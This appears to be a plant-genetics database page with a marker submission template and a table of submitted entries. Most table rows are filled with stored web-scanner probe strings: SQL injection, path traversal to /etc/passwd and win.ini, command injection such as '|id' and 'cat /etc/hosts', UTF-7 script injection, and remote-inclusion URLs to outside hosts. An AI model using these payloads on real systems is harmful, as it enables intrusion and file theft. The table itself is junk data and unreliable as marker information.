Marker Data Submission and Feedback

We appreciate and encourage users of AMP to share their new marker/polymorphism data with the research community. Please fill in and submit your data by using the following preformatted template file.

Please send any related questions to: lianxinonline@163.com

All the submitted data will be displayed below with main marker information and the dynamic submitting status.

FieldValues/ConstraintsDescriptionExample
Original Marker Name *PT1
Genetic Marker Type *CAPS
Chromosome *The chromosome in which the marker/polymorphism is found5
Strand *+
BAC Stock No. *2
BAC Accession No. *AC009243
Position on BAC *The left side of Forward primer on BAC17012
Position on chromosome *The left side of Forward primer on the whole chromosome29273727
Polymorphism type *InDel number or SNP M/NIND 20/-20, SNP A/T
Flank Sequence 1 (left side) *Flank Sequence of polymorphism site (left side)ATGGTGCCGTGACGT
Flank Sequence 2 (right side) *Flank Sequence of polymorphism site (right side)AATTGGGTGTGCTAG
Forward primer (5'-3')GTTCTCTCTCAGATT
Reverse primer (5'-3')TTGTGTTGTCCATGA
Amplicon length (Col-0) *120
Amplicon length (Ler) *140
Amplicon length (other ecotypes)140
Restriction Enzyme Name *Name of the restriction enzyme used to detect the polymorphism for CAPS, AFLP, or RFLP markers. consult REBASE for standard enzyme nameHindIII;EcoRV
Special PCR Conditions *Indicate any special conditions required for marker detectionannealing temp 62C
Marker/Polymorphism Citation/Reference_idPubMed IDPMID: 20479223
Gel pictureJPEG
Contact PersonLast name, First nameLee,Louis
Community of Contact PersonLife Science College, Peking University, Beijing, China
Contact Person E-mail Addresscurrent email addressLouis_lee@pku.eud.cn
 
Marker_IDBAC_NameTypeChrStrandBAC_StockBAC_AccBAC_StartChr_StartPoly_TypeSeq_LSeq_RPrimer_FPrimer_RColLerOtherEnzymePCR_DescBAC_DescPic_URLNameAddEmailState
1-1-00001SSLP1+111SNP A/TTGGTGCCGTGACGTTGGTGCCGTGACGTTGGTGCCGTGACGTTGGTGCCGTGACGT12121211gelpic/Chr1/1-1.jpgpengreceived
atestu-atestu-000013466548797atestuatestuaatestuatestu1atestuatestuatestuatestuatestuatestuatestuatestuatestuatestugelpic/Chratestu/atestu-13466548797.jpg13466548797atestuatestu@example.comreceived
1-57-0004gfhgSSLP1+6754566556SNP A/TAgagagag1276534dfasdfzxczxcgelpic/Chr1/67-gfhg.jpgdfgsfdsgsa@in.omreceived
-1-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1frameanonymoussecurity1-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1linkanonymoussecurity1-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/etc/./anonymousec-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1multianonymoussecurity1-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
--1 uNiOn sElEct -- --000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
--1" uNiOn sElEct -- --000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
--1") uNiOn sElEct -- --000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/../../../../../../../windows/win.ini-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows/win.ini-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-htTp://www.site120.cn/2012_rFi_0702.txt-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 anD 4543=4543-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 anD 7950=5516-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-hTTp://www.anonymous.com-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-print 8-99991080;-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../../../../../../../../../../../../../../../../etc/./anonymousec-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
--1 uNiOn sElEct concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)) -- --000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
--1" uNiOn sElEct concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)) -- --000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
--1") uNiOn sElEct concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)) -- --000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/../../../../../../../windows/win.ini.htm-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/windows/win.ini.htm-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows/win.ini.htm-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1[]-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-`cat /etc/hosts`-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
--000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
- WebScanCustomInjectedHeader: Injected_by_anonymous-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-aa WebScanCustomInjectedHeader: Injected_by_anonymous-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
- WebScanCustomInjectedHeader: Injected_by_anonymous -000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-aa WebScanCustomInjectedHeader: Injected_by_anonymous -000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-utf7anonymoussecurity2-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1xsstest1-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-www.anonymous.com-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 anD 1770=1770---000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 anD 6197=3743---000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-http://www.site120.cn/2012_rFi_0702.txt-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-frameanonymoussecurity2-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/etc/./anonymousec.htm-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-multianonymoussecurity2-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
--1 uNiOn sElEct concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)),concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)) -- --000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
--1" uNiOn sElEct concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)),concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)) -- --000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
--1") uNiOn sElEct concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)),concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)) -- --000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/../../../../../../../etc/./passwd-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/./passwd-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/./passwd-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1"-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-linkanonymoussecurity2-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 anD 5804=5804#-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 anD 3291=5119#-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-print 8-99991080;#-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-cat /etc/hosts-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-+/v8 +ADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg--000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../../../../../../../../../../../../../../../../etc/./anonymousec.htm-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
--1 uNiOn sElEct concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)),concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)),concat(char(98),char(53),char(57),char(50),char(49),char(56)11111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
--1" uNiOn sElEct concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)),concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)),concat(char(98),char(53),char(57),char(50),char(49),char(5611111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
--1") uNiOn sElEct concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)),concat(char(98),char(53),char(57),char(50),char(49),char(56),char(57),char(53),char(48)),concat(char(98),char(53),char(57),char(50),char(49),char(511111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/../../../../../../../etc/./passwd.htm-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/./passwd.htm-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc/./passwd.htm-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 anD (select 1 from (select count(*),concat(0x7e73716c317363616e743473747e,floor(rand(0)*2))x from information_schema.tables group by x)a)-- -000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 anD 6625=6625/*-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 anD 2382=8683/*-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-`type %systemroot%win.ini`-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-+/v9 +ADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg--000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1xsstest1scriptx-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1xsstest1)x-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1xsstest111111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1xsstest128573x-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1xsstest1(x-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1xsstest1alertx-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1xsstest1/x-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1xsstest1>x-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/etc/./anonymousec............................................................................................................................................................................................................................................11111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/etc/./passwd-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-www.site120.cn/2012_rFi_0702.txt-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1(-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1%-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 anD 9723=9723-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../../../../../../../../../../../../../../../../etc/./anonymousec.............................................................................................................................................................................................11111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 #-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-+/v/ +ADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg--000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-type %systemroot%win.ini-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 anD 8875=5374-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1);print 8-99991080;#-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-http://hit115131226a.bxss.me/-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-c:/windows/win.ini-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-199999999999999999999-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-file:/c:/windows/win.ini-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1YYYYYYYYYYYYYYYYYYYY-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1;cat /etc/hosts;-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/WEB-INF/web.xml-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa11111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../WEB-INF/web.xml?-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1];}print 8-99991080;#-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1|id-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-/WEB-INF/web.xml-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../WEB-INF/web.xml-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-Array-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../../../WEB-INF/web.xml-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../../../WEB-INF/web.xml?-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../../../WEB-INF/web.xml-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../../../../../WEB-INF/web.xml-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1;print 8-99991080;#-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../../../../../../WEB-INF/web.xml?-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../../../../../../WEB-INF/web.xml-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 type %systemroot%win.ini-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../../../../../../../WEB-INF/web.xml-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../../../../../../../WEB-INF/web.xml-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-../../../../../../../../WEB-INF/web.xml-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-include.jsp-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1".print 8-99991080;"//-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1".(print 8-99991080)."-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-include.jsp?-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 oR 7599=7599-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 oR 9384=9384---000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 oR 1302=0755---000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 oR 0148=1939---000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 oR 7313=7313---000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 oR 6379=4784---000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 oR 2475=2509---000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 oR 9814=9814---000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 oR 0257=5427#-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 oR 6422=6422#-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 oR 3544=3544/*-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 oR 7715=8651-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1 oR 8277=8277-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
-1) oR 2185=7073#-000011111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived
111111111111111gelpic/Chr/1-1.jpg11abc123@mycom.comreceived